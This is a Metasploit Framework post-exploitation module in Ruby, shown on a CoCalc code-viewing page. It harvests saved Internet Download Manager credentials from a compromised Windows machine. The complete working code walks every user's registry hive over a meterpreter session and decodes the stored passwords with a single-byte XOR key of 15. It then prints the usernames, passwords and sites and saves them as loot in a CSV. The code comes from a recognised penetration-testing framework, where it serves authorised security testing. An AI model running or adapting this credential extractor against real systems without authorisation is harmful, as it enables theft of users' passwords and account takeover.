Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/idm.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::Windows::Registry
8
include Msf::Auxiliary::Report
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',
15
'Description' => %q{
16
This module recovers the saved premium download account passwords from
17
Internet Download Manager (IDM). These passwords are stored in an encoded
18
format in the registry. This module traverses through these registry entries
19
and decodes them. Thanks to the template code of theLightCosine's CoreFTP
20
password module.
21
},
22
'License' => MSF_LICENSE,
23
'Author' => [
24
'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',
25
'Unknown', # SecurityXploded Team, www.SecurityXploded.com
26
],
27
'Platform' => [ 'win' ],
28
'SessionTypes' => [ 'meterpreter' ],
29
'Notes' => {
30
'Stability' => [CRASH_SAFE],
31
'SideEffects' => [],
32
'Reliability' => []
33
}
34
)
35
)
36
end
37
38
def run
39
creds = Rex::Text::Table.new(
40
'Header' => 'Internet Downloader Manager Credentials',
41
'Indent' => 1,
42
'Columns' =>
43
[
44
'User',
45
'Password',
46
'Site'
47
]
48
)
49
50
registry_enumkeys('HKU').each do |k|
51
next unless k.include?('S-1-5-21')
52
next if k.include?('_Classes')
53
54
print_status("Looking at Key #{k}")
55
56
begin
57
subkeys = registry_enumkeys("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\")
58
59
if subkeys.nil? || subkeys.empty?
60
print_status('IDM not installed for this user.')
61
next
62
end
63
64
subkeys.each do |site|
65
user = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'User')
66
epass = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'EncPassword')
67
next if epass.nil? || (epass == '')
68
69
pass = xor(epass)
70
print_good("Site: #{site} (User=#{user}, Password=#{pass})")
71
creds << [user, pass, site]
72
end
73
74
print_status('Storing data...')
75
path = store_loot(
76
'idm.user.creds',
77
'text/csv',
78
session,
79
creds.to_csv,
80
'idm_user_creds.csv',
81
'Internet Download Manager User Credentials'
82
)
83
print_good("IDM user credentials saved in: #{path}")
84
rescue StandardError => e
85
print_error("An error has occurred: #{e}")
86
end
87
end
88
end
89
90
def xor(ciphertext)
91
pass = ciphertext.unpack('C*')
92
key = 15
93
for i in 0..pass.length - 1 do
94
pass[i] ^= key
95
end
96
return pass.pack('C*')
97
end
98
end
99
100